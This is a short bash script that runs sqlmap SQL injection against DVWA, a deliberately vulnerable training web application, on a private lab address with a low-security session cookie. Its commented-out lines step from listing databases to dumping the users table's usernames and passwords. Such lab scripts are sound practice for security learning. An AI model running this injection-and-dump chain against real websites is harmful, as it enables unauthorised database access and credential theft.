#!/usr/bin/env bash
SESSION_ID="066f7c55695c9c2d651ee0f421db861f"
IP="10.0.0.5";
URL="http://${IP}/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
COOKIE="PHPSESSID=${SESSION_ID};security=low"

echo "$URL"
sqlmap -u $URL --cookie=$COOKIE --flush-session
#sqlmap -u $URL --cookie=$COOKIE --dbs
#sqlmap -u $URL --cookie=$COOKIE -D dvwa --tables
#sqlmap -u $URL --cookie=$COOKIE -D dvwa -T users --columns
#sqlmap -u $URL --cookie=$COOKIE -D dvwa -T users -C user --dump
#sqlmap -u $URL --cookie=$COOKIE -D dvwa -T users -C password --dump
